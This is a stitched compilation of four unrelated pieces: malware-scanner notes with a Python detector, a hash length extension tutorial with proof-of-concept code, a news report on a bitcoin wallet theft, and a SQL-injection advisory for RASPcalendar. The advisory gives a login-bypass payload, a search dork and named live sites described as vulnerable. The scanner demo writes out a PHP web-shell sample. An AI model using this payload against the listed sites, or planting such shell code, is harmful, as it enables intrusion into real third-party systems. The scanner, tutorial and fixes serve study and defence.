Once you start maldet in monitor mode, it will preprocess the paths based on the option specified followed by starting the inotify process. The starting of the inotify process can be a time consuming task as it needs to set up a monitor hook for every file under the monitored paths. Although the startup process can impact the load temporarily, once the process has started it maintains all of its resources inside kernel memory and has a very small userspace footprint in memory or cpu usage. See http://www.rfxn.com/appdocs/README.maldetect for more details on inotify monitoring. https://www.rfxn.com/projects/linux-malware-detect/
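The three detection methods the feature list names (MD5 file hashes, HEX pattern matches and a statistical base64 check) plus the no-permissions quarantine, as an added example in Python; this is my illustration, not LMD's code, and the signature names, patterns and sample files are constructed for it.

```python
import os
import re
import time
import hashlib
import tempfile

# Constructed HEX signatures: byte sequences that identify a threat family.
# The first is the hex form of "eval(base64_decode("; names are hypothetical.
HEX_SIGNATURES = {
    'php.cmdshell.example': bytes.fromhex('6576616c286261736536345f6465636f646528'),
    'php.exe.example': b'passthru($_GET[',
}

# Constructed MD5 signature: hash of a whole known-bad file.
KNOWN_BAD = b'<?php /* constructed known sample */ echo "known bad"; ?>\n'
MD5_SIGNATURES = {hashlib.md5(KNOWN_BAD).hexdigest(): 'bin.trojan.example'}


def base64_ratio(data, minimum_run=120):
    """Share of the file made up of long unbroken base64-alphabet runs; a
    statistical stand-in for LMD's obfuscated-threat component."""
    runs = re.findall(rb'[A-Za-z0-9+/=]{%d,}' % minimum_run, data)
    return sum(len(r) for r in runs) / float(len(data)) if data else 0.0


def scan_file(path, md5_sigs=MD5_SIGNATURES, hex_sigs=HEX_SIGNATURES, b64_threshold=0.6):
    """Return (method, signature_name) for a hit, or None for a clean file.
    Cheapest and most exact check first: whole-file hash, then patterns, then stats."""
    with open(path, 'rb') as f:
        data = f.read()
    digest = hashlib.md5(data).hexdigest()
    if digest in md5_sigs:
        return ('md5', md5_sigs[digest])
    for name, pattern in hex_sigs.items():
        if pattern in data:
            return ('hex', name)
    if base64_ratio(data) >= b64_threshold:
        return ('stat', 'base64.inject.suspect')
    return None


def scan_tree(root, recent_days=None):
    """Walk root like --scan-all, or only files changed in the last N days like
    --scan-recent.  Returns {relative path: hit}."""
    cutoff = time.time() - recent_days * 86400 if recent_days else None
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if cutoff and os.stat(path).st_mtime < cutoff:
                continue
            hit = scan_file(path)
            if hit:
                hits[os.path.relpath(path, root)] = hit
    return hits


def quarantine(path, qdir):
    """Move a hit into the quarantine queue and strip every permission bit, so
    the web server can neither serve nor execute it until it is restored."""
    os.makedirs(qdir, exist_ok=True)
    tag = hashlib.md5(path.encode()).hexdigest()[:8]       # keep origin traceable
    dst = os.path.join(qdir, os.path.basename(path) + '.' + tag)
    os.rename(path, dst)
    os.chmod(dst, 0)
    return dst


def demo():
    """Constructed user webroot with one clean and three bad files; returns the
    scan hits plus the quarantined path and its resulting permission bits."""
    root = tempfile.mkdtemp()
    samples = {
        'index.php': b'<?php include "header.php"; echo "hello"; ?>\n',
        'shell.php': b'<?php eval(base64_decode($_POST["x"])); ?>\n',
        'known.php': KNOWN_BAD,
        'obf.php': b'<?php $x="' + b'A' * 400 + b'"; eval(gzinflate(base64_decode($x))); ?>\n',
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), 'wb') as f:
            f.write(content)
    hits = scan_tree(root, recent_days=1)
    qpath = quarantine(os.path.join(root, 'shell.php'), os.path.join(root, '.quarantine'))
    return hits, qpath, os.stat(qpath).st_mode & 0o777


if __name__ == '__main__':
    hits, qpath, mode = demo()
    for path, (method, sig) in sorted(hits.items()):
        print('%-10s %-4s %s' % (path, method, sig))
    print('quarantined %s (mode %03o)' % (qpath, mode))
```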
-
You can grab the hash_extender tool on Github! (Administrative note: I’m no longer at Tenable! I left on good terms, and now I’m a consultant at Leviathan Security Group. Feel free to contact me if you need more information!) Awhile back, my friend @mogigoma and I were doing a capture-the-flag contest at https://stripe-ctf.com. One of the levels of the contest required us to perform a hash length extension attack. I had never even heard of the attack at the time, and after some reading I realized that not only is it a super cool (and conceptually easy!) attack to perform, there is also a total lack of good tools for performing said attack! After hours of adding the wrong number of null bytes or incorrectly adding length values, I vowed to write a tool to make this easy for myself and anybody else who’s trying to do it. So, after a couple weeks of work, here it is! Now I’m gonna release the tool, and hope I didn’t totally miss a good tool that does the same thing! It’s called hash_extender, and implements a length extension attack against every algorithm I could think of: MD4 MD5 RIPEMD-160 SHA-0 SHA-1 SHA-256 SHA-512 WHIRLPOOL I’m more than happy to extend this to cover other hashing algorithms as well, provided they are “vulnerable” to this attack — MD2, SHA-224, and SHA-384 are not. Please contact me if you have other candidates and I’ll add them ASAP! The attack An application is susceptible to a hash length extension attack if it prepends a secret value to a string, hashes it with a vulnerable algorithm, and entrusts the attacker with both the string and the hash, but not the secret. Then, the server relies on the secret to decide whether or not the data returned later is the same as the original data. It turns out, even though the attacker doesn’t know the value of the prepended secret, he can still generate a valid hash for {secret || data || attacker_controlled_data}! 
This is done by simply picking up where the hashing algorithm left off; it turns out, 100% of the state needed to continue a hash is in the output of most hashing algorithms! We simply load that state into the appropriate hash structure and continue hashing. TL;DR: given a hash that is composed of a string with an unknown prefix, an attacker can append to the string and produce a new hash that still has the unknown prefix. Example Let’s look at a step-by-step example. For this example: let secret = “secret” let data = “data” let H = md5() let signature = hash(secret || data) = 6036708eba0d11f6ef52ad44e8b74d5b let append = “append” The server sends data and signature to the attacker. The attacker guesses that H is MD5 simply by its length (it’s the most common 128-bit hashing algorithm), based on the source, or the application’s specs, or any way they are able to. Knowing only data, H, and signature, the attacker’s goal is to append append to data and generate a valid signature for the new data. And that’s easy to do! Let’s see how. Padding Before we look at the actual attack, we have to talk a little about padding. When calculating H(secret + data), the string (secret + data) is padded with a ’1? bit and some number of ’0? bits, followed by the length of the string. That is, in hex, the padding is a 0×80 byte followed by some number of 0×00 bytes and then the length. The number of 0×00 bytes, the number of bytes reserved for the length, and the way the length is encoded, depends on the particular algorithm and blocksize. With most algorithms (including MD4, MD5, RIPEMD-160, SHA-0, SHA-1, and SHA-256), the string is padded until its length is congruent to 56 bytes (mod 64). Or, to put it another way, it’s padded until the length is 8 bytes less than a full (64-byte) block (the 8 bytes being size of the encoded length field). 
There are two hashes implemented in hash_extender that don’t use these values: SHA-512 uses a 128-byte blocksize and reserves 16 bytes for the length field, and WHIRLPOOL uses a 64-byte blocksize and reserves 32 bytes for the length field.

The endianness of the length field is also important. MD4, MD5, and RIPEMD-160 are little-endian, whereas the SHA family and WHIRLPOOL are big-endian. Trust me, that distinction cost me days of work!

In our example, length(secret || data) = length(“secretdata”) is 10 (0x0a) bytes, or 80 (0x50) bits. So, we have 10 bytes of data (“secretdata”), 46 bytes of padding (80 00 00 …), and an 8-byte little-endian length field (50 00 00 00 00 00 00 00), for a total of 64 bytes (or one block). Put together, it looks like this:

0000  73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00  secretdata......
0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00  ........P.......

Breaking down the string, we have:

“secret” = secret
“data” = data
80 00 00 … — The 46 bytes of padding, starting with 0x80
50 00 00 00 00 00 00 00 — The bit length in little endian

This is the exact data that H hashed in the original example.

The attack

Now that we have the data that H hashes, let’s look at how to perform the actual attack.

First, let’s just append append to the string. Easy enough! Here’s what it looks like:

0000  73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00  secretdata......
0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00  ........P.......
0040  61 70 70 65 6e 64                                append

The hash of that block is what we ultimately want to a) calculate, and b) get the server to calculate.
The value of that block of data can be calculated in two ways:

By sticking it in a buffer and performing H(buffer)
By starting at the end of the first block, using the state we already know from signature, and hashing append starting from that state

The first method is what the server will do, and the second is what the attacker will do. Let’s look at the server, first, since it’s the easier example.

Server’s calculation

We know the server will prepend secret to the string, so we send it the string minus the secret value:

0000  64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00  data............
0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 50 00 00 00 00 00 00 00 61 70 70 65 6e 64  ..P.......append

Don’t be fooled by this being exactly 64 bytes (the blocksize) — that’s only happening because secret and append are the same length. Perhaps I shouldn’t have chosen that as an example, but I’m not gonna start over!

The server will prepend secret to that string, creating:

0000  73 65 63 72 65 74 64 61 74 61 80 00 00 00 00 00  secretdata......
0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00  ........P.......
0040  61 70 70 65 6e 64                                append

And hashes it to the following value:

6ee582a1669ce442f3719c47430dadee

For those of you playing along at home, you can prove this works by copying and pasting this into a terminal:

echo '
#include <stdio.h>
#include <openssl/md5.h>

int main(int argc, const char *argv[])
{
  MD5_CTX c;
  unsigned char buffer[MD5_DIGEST_LENGTH];
  int i;

  MD5_Init(&c);
  MD5_Update(&c, "secret", 6);
  /* "data", then the 46 bytes of padding, the little-endian bit length (0x50 = 80 bits), then "append" */
  MD5_Update(&c, "data"
                 "\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                 "\x00\x00\x00\x00"
                 "\x50\x00\x00\x00\x00\x00\x00\x00"
                 "append", 64);
  MD5_Final(buffer, &c);
  for (i = 0; i < 16; i++) {
    printf("%02x", buffer[i]);
  }
  printf("\n");

  return 0;
}' > hash_extension_1.c

gcc -o hash_extension_1 hash_extension_1.c -lssl -lcrypto

./hash_extension_1

All right, so the server is going to be checking the data we send against the signature 6ee582a1669ce442f3719c47430dadee. Now, as the attacker, we need to figure out how to generate that signature!

Client’s calculation

So, how do we calculate the hash of the data shown above without actually having access to secret?

Well, first, we need to look at what we have to work with: data, append, H, and H(secret || data).

We need to define a new function, H', which uses the same hashing algorithm as H, but whose starting state is the final state of H(secret || data), i.e., signature. Once we have that, we simply calculate H'(append) and the output of that function is our hash.
It sounds easy (and is!); have a look at this code:

echo '
#include <stdio.h>
#include <arpa/inet.h>     /* htonl() */
#include <openssl/md5.h>

int main(int argc, const char *argv[])
{
  int i;
  unsigned char buffer[MD5_DIGEST_LENGTH];
  MD5_CTX c;

  MD5_Init(&c);
  /* Hash exactly one full block so the context has consumed 64 bytes */
  MD5_Update(&c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", 64);
  c.A = htonl(0x6036708e); /* <-- This is the hash we already had */
  c.B = htonl(0xba0d11f6);
  c.C = htonl(0xef52ad44);
  c.D = htonl(0xe8b74d5b);
  MD5_Update(&c, "append", 6); /* This is the appended data. */
  MD5_Final(buffer, &c);
  for (i = 0; i < 16; i++) {
    printf("%02x", buffer[i]);
  }
  printf("\n");

  return 0;
}' > hash_extension_2.c

gcc -o hash_extension_2 hash_extension_2.c -lssl -lcrypto

./hash_extension_2

The output is, just like before:

6ee582a1669ce442f3719c47430dadee

So we know the signature is right. The difference is, we didn’t use secret at all!

What’s happening!? Well, we create a MD5_CTX structure from scratch, just like normal. Then we take the MD5 of 64 ‘A’s. We take the MD5 of a full (64-byte) block of ‘A’s to ensure that any internal values — other than the state of the hash itself — are set to what we expect.

Then, after that is done, we replace c.A, c.B, c.C, and c.D with the values that were found in signature: 6036708eba0d11f6ef52ad44e8b74d5b. This puts the MD5_CTX structure in the same state as it finished in originally, and means that anything else we hash — in this case append — will produce the same output as it would have had we hashed it the usual way.

We use htonl() on the values before setting the state variables because MD5 — being little-endian — outputs its values in little-endian as well.

Result

So, now we have this string:

0000  64 61 74 61 80 00 00 00 00 00 00 00 00 00 00 00  data............
0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 50 00 00 00 00 00 00 00 61 70 70 65 6e 64  ..P.......append

And this signature for H(secret || data || append):

6ee582a1669ce442f3719c47430dadee

And we can generate the signature without ever knowing what the secret was! So, we send the string to the server along with our new signature. The server will prepend the signature, hash it, and come up with the exact same hash we did (victory!).

The tool

You can grab the hash_extender tool on Github!

This example took me hours to write. Why? Because I made about a thousand mistakes writing the code. Too many NUL bytes, not enough NUL bytes, wrong endianness, wrong algorithm, used bytes instead of bits for the length, and all sorts of other stupid problems.

The first time I worked on this type of attack, I spent from 2300h till 0700h trying to get it working, and didn’t figure it out till after sleeping (and with Mak’s help). And don’t even get me started on how long it took to port this attack to MD5. Endianness can die in a fire.

Why is it so difficult? Because this is crypto, and crypto is immensely complicated and notoriously difficult to troubleshoot. There are lots of moving parts, lots of side cases to remember, and it’s never clear why something is wrong, just that the result isn’t right. What a pain!

So, I wrote hash_extender. hash_extender is (I hope) the first free tool that implements this type of attack. It’s easy to use and implements this attack for every algorithm I could think of.

Here’s an example of its use:

$ ./hash_extender --data data --secret 6 --append append --signature 6036708eba0d11f6ef52ad44e8b74d5b --format md5
Type: md5
Secret length: 6
New signature: 6ee582a1669ce442f3719c47430dadee
New string: 64617461800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005000000000000000617070656e64

If you’re unsure about the hash type, you can let it try different types by leaving off the --format argument.
I recommend using the --table argument as well if you’re trying multiple algorithms:

$ ./hash_extender --data data --secret 6 --append append --signature 6036708eba0d11f6ef52ad44e8b74d5b --out-data-format html --table
md4  89df68618821cd4c50dfccd57c79815b  data80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000P00000000000000append
md5  6ee582a1669ce442f3719c47430dadee  data80000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000P00000000000000append

There are plenty of options for how you format inputs and outputs, including HTML (where you use %NN notation), CString (where you use \xNN notation, as well as \r, \n, \t, etc.), hex (such as how the hashes were specified above), etc.

By default I tried to choose what I felt were the most reasonable options:

Input data: raw
Input hash: hex
Output data: hex
Output hash: hex

Here’s the help page for reference:

--------------------------------------------------------------------------------
HASH EXTENDER
--------------------------------------------------------------------------------

By Ron Bowes
See LICENSE.txt for license information.

Usage: ./hash_extender <--data=|--file=> --signature= --format= [options]

INPUT OPTIONS
-d --data=
      The original string that we're going to extend.
--data-format=
      The format the string is being passed in as. Default: raw.
      Valid formats: raw, hex, html, cstr
--file=
      As an alternative to specifying a string, this reads the original string
      as a file.
-s --signature=
      The original signature.
--signature-format=
      The format the signature is being passed in as. Default: hex.
      Valid formats: raw, hex, html, cstr
-a --append=
      The data to append to the string. Default: raw.
--append-format=
      Valid formats: raw, hex, html, cstr
-f --format= [REQUIRED]
      The hash_type of the signature. This can be given multiple times if you
      want to try multiple signatures.
      'all' will base the chosen types off the size of the signature and use
      the hash(es) that make sense.
      Valid types: md4, md5, ripemd160, sha, sha1, sha256, sha512, whirlpool
-l --secret=
      The length of the secret, if known. Default: 8.
--secret-min=
--secret-max=
      Try different secret lengths (both options are required)

OUTPUT OPTIONS
--table
      Output the string in a table format.
--out-data-format=
      Output data format.
      Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy
--out-signature-format=
      Output signature format.
      Valid formats: none, raw, hex, html, html-pure, cstr, cstr-pure, fancy

OTHER OPTIONS
-h --help
      Display the usage (this).
--test
      Run the test suite.
-q --quiet
      Only output what's absolutely necessary (the output string and the
      signature)

Defense

So, as a programmer, how do you solve this? It’s actually pretty simple. There are two ways:

Don’t trust a user with encrypted data or signatures, if you can avoid it.
If you can’t avoid it, then use HMAC instead of trying to do it yourself. HMAC is designed for this.

HMAC is the real solution. HMAC is designed for securely hashing data with a secret key.

As usual, use constructs designed for what you’re doing rather than doing it yourself. The key to all crypto! [pun intended]

And finally, you can grab the hash_extender tool on Github!

Source: blog.skullsecurity.org
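The post's two C programs lean on OpenSSL's MD5_CTX to resume the hash. The following is an added example, written for this page and not code from the post or from hash_extender: a small MD5 built directly from the compression function so its state can be seeded from a digest, with the post's numbers (secret "secret", data "data", append "append", secret length 6) carried through end to end, plus the naive prefix check beside the HMAC check from the Defense section. It needs only the Python standard library; hashlib is used solely as the independent "server side" to confirm the forged signature.

```python
# Added example (not from the original post or hash_extender): MD5 with a
# resumable state, used to perform the length extension described above.
import hashlib
import hmac
import math
import struct

MD5_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2**32) & 0xFFFFFFFF for i in range(64)]
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _compress(state, block):
    """One MD5 compression of a 64-byte block; returns the new (A, B, C, D)."""
    a, b, c, d = state
    m = struct.unpack("<16I", block)
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + _K[i] + m[g]) & _MASK
        a, d, c, b = d, c, b, (b + _rotl(f, _S[i])) & _MASK
    return tuple((x + y) & _MASK for x, y in zip(state, (a, b, c, d)))


def md5_padding(message_len):
    """0x80, zero fill to 56 mod 64, then the little-endian 64-bit *bit* length:
    the same bytes the hex dumps above show after 'secretdata'."""
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", message_len * 8)


def md5_from_state(state, data, total_len):
    """Hash `data` as the continuation of a message whose earlier (whole) blocks
    left the compression function in `state`. total_len is the byte length of
    the entire message, already-consumed blocks included, for the length field."""
    buf = data + md5_padding(total_len)
    for off in range(0, len(buf), 64):
        state = _compress(state, buf[off:off + 64])
    return struct.pack("<4I", *state)


def md5_digest(data):
    return md5_from_state(MD5_IV, data, len(data))


def length_extend(signature_hex, data, append, secret_len):
    """Forge md5(secret || data || glue || append) from md5(secret || data).
    Only the secret's length is needed, never its value."""
    # The digest is the state: four little-endian words, exactly what the
    # post's second C program loads into c.A..c.D with htonl().
    state = struct.unpack("<4I", bytes.fromhex(signature_hex))
    glue = md5_padding(secret_len + len(data))
    consumed = secret_len + len(data) + len(glue)   # whole blocks: multiple of 64
    new_sig = md5_from_state(state, append, consumed + len(append))
    return data + glue + append, new_sig.hex()


def naive_verify(secret, data, signature_hex):
    """The vulnerable server check: md5(secret || data), computed with hashlib
    so the forgery is confirmed against an independent implementation."""
    return hmac.compare_digest(hashlib.md5(secret + data).hexdigest(), signature_hex)


def hmac_sign(secret, data):
    return hmac.new(secret, data, hashlib.md5).hexdigest()


def hmac_verify(secret, data, signature_hex):
    """The fix from the Defense section. HMAC hashes the inner digest again
    under the key, so resuming from a known tag buys the attacker nothing."""
    return hmac.compare_digest(hmac_sign(secret, data), signature_hex)


if __name__ == "__main__":
    sig = md5_digest(b"secretdata").hex()          # what the server hands out
    new_data, new_sig = length_extend(sig, b"data", b"append", 6)
    print("original signature :", sig)
    print("forged signature   :", new_sig)
    print("naive check accepts:", naive_verify(b"secret", new_data, new_sig))
    print("HMAC check accepts :", hmac_verify(b"secret", new_data, new_sig))
```

Running it prints the post's 6036708eba0d11f6ef52ad44e8b74d5b and 6ee582a1669ce442f3719c47430dadee, the naive check accepting the forged pair and the HMAC check rejecting it. Swapping the constants, block size and length-field endianness is all it takes to do the same for SHA-1 or SHA-256, which is exactly where the post's "endianness can die in a fire" applies.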
-
Here’s your digital-currency lesson of the day, courtesy of a guy who calls himself TradeFortress: “I don’t recommend storing any bitcoins accessible on computers connected to the internet.”

That may sound like a paradox. Bitcoin is the world’s most popular digital currency, and it’s controlled by a vast collection of computers spread across the internet. But TradeFortress knows what he’s talking about. He’s the founder of inputs.io, a company that used to store bitcoins in digital wallets for people across the globe. The site was just hacked, with the bandits making off with more than a million dollars’ worth of bitcoins.

Yes, bitcoins are digital. And, yes, bitcoin transactions necessarily happen on the internet. But you can store bitcoins offline, and that’s what the most careful of investors will do. A collection of bitcoins is essentially a private cryptographic key you can use to send money to someone else, and though you can store that key in an online digital wallet, you can also store it on an offline computer — and even on a physical item here in the real world, writing it on a piece of paper or engraving it on a ring. That’s why your money can’t be hacked.

Until last week, inputs.io seemed like a nifty service for Bitcoin users. The company not only offered bitcoin wallets, it mixed the wallets up in order to anonymize the coins they stored, sped up bitcoin payments, and even spared them from the tiny transaction fees that are typically charged on the bitcoin network. But there was a catch. You had to trust the company — and its internet-connected computers — with your bitcoins.

In retrospect, that was a bad idea. And now, Inputs.io customers are learning just how bad of an idea it was. The site was compromised on Oct. 23, and again on Oct. 26, and hackers made off with 4,100 bitcoins ($1.2 million) stolen in two separate attacks. The company waited until this week to notify customers of the incident, which only affects certain users.
A small number of Bitcoins belonging to TradeFortress’s other business, CoinLenders, were also taken, TradeFortress said in an email interview (he didn’t provide his real name). Inputs.io doesn’t have the funds to pay back everything that was stolen, but TradeFortress says he’s going to issue partial refunds. “I’m repaying with all of my personal Bitcoins, as well as remaining cold storage coins on Inputs, which adds up to 1540 BTC,” he told WIRED.

TradeFortress says that this was a social engineering attack, meaning that the attacker masqueraded as someone he wasn’t in order to get access to the site’s systems on cloud-hosting provider Linode. “The attack was done through compromising a chain of email accounts which eventually allowed the attacker to reset the password for the Linode server,” he said.

The hacker’s first step was recovering an email address for an account that TradeFortress set up six years ago. The “attacker rented an Australian server to proxy as close to my geographical location so it won’t raise alarms with email recoveries,” TradeFortress said in a forum post.

“I know this doesn’t mean much, but I’m sorry, and saying that I’m very sad that this happened is an understatement,” TradeFortress wrote on the inputs.io website.

UPDATE: 6:25 EST 11/07/13: This story has been updated to include comment from TradeFortress.

Via wired.com
-
RASPcalendar version 1.01 suffers from a remote SQL injection vulnerability that allows for login bypass.

---------------------------------------------------
RASPcalendar 1.01 [ASP] Admin Login Vulnerabilities
---------------------------------------------------

Author          : Hackeri-AL
Date            : 06-11-2013
Vendor Homepage : http://www.rttucson.com/files.html
Software link   : http://www.rttucson.com/RASPcalendar.zip
Version         : 1.01
Tested On       : Windows XP

------------------------------------------------------------
Google Dork: allinurl:RASPcalendar "powered by RASPcalendar"
------------------------------------------------------------

Example : http://www.usfim.it/RASPcalendar/
        : http://site.com/events
        : http://site.com/calendar
        : etc...

Go to : http://www.usfim.it/RASPcalendar/admin/

UserName : 1'or'1
PassWord : 1'or'1

Login successful

------------------------------------------------------------
Vuln sites demo :
http://www.usfim.it/RASPcalendar/admin
http://www.davemitchellassociates.com/events/admin
http://www.bradandrebecca.com/Calendar/admin
http://www.hlubline.com/pt/calendar/admin
------------------------------------------------------------

Found By Hackeri-AL , UAH-Crew Group 2009-2013
UNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~ [~] Legends Of Albania
------------------------------------------------------------

RASPcalendar 1.01 - [ASP] Admin Login Vulnerabilities
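The advisory gives the payload but not the query it lands in, and RASPcalendar's source is not on this page. The following is an added example, not the product's code: a constructed in-memory SQLite model of the string-built login query that this class of bypass relies on, showing why 1'or'1 in both fields passes it, beside the parameterised query that does not. Table name, column names and the demo credentials are all assumptions made here. Whether a bare '1' counts as true in a WHERE clause is engine-specific; SQLite coerces it to 1 (true), which matches the behaviour the advisory reports on its target.

```python
# Added example (not RASPcalendar's code): vulnerable vs. parameterised login,
# exercised with the advisory's payload against a constructed SQLite table.
import sqlite3

# Constructed demo credentials; nothing here comes from the advisory.
DEMO_USER = "admin"
DEMO_PASS = "not-the-real-password"
PAYLOAD = "1'or'1"          # the value the advisory puts in both login fields


def _demo_db():
    """In-memory stand-in (assumed schema) for the calendar's admin table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    con.execute("INSERT INTO admins VALUES (?, ?)", (DEMO_USER, DEMO_PASS))
    return con


def build_vulnerable_query(username, password):
    """Query text built by string concatenation, the pattern the bypass needs."""
    return ("SELECT COUNT(*) FROM admins WHERE username='" + username
            + "' AND password='" + password + "'")


def vulnerable_login(username, password):
    """With the payload the WHERE clause reads
    username='1' OR '1' AND password='1' OR '1'
    and the trailing OR '1' makes it true for every row, so the count is > 0."""
    con = _demo_db()
    try:
        return con.execute(build_vulnerable_query(username, password)).fetchone()[0] > 0
    finally:
        con.close()


def safe_login(username, password):
    """Bound parameters: the quotes in the payload are data, never SQL."""
    con = _demo_db()
    try:
        row = con.execute(
            "SELECT COUNT(*) FROM admins WHERE username=? AND password=?",
            (username, password)).fetchone()
        return row[0] > 0
    finally:
        con.close()


if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD, PAYLOAD))
    print("vulnerable login with payload :", vulnerable_login(PAYLOAD, PAYLOAD))
    print("parameterised login, payload  :", safe_login(PAYLOAD, PAYLOAD))
    print("parameterised login, real cred:", safe_login(DEMO_USER, DEMO_PASS))
```

The concatenated query is printed first so the operator-precedence reading above can be checked against what actually reaches the database. In classic ASP the equivalent fix is an ADODB.Command with Parameters.Append instead of building the SQL string with the request values.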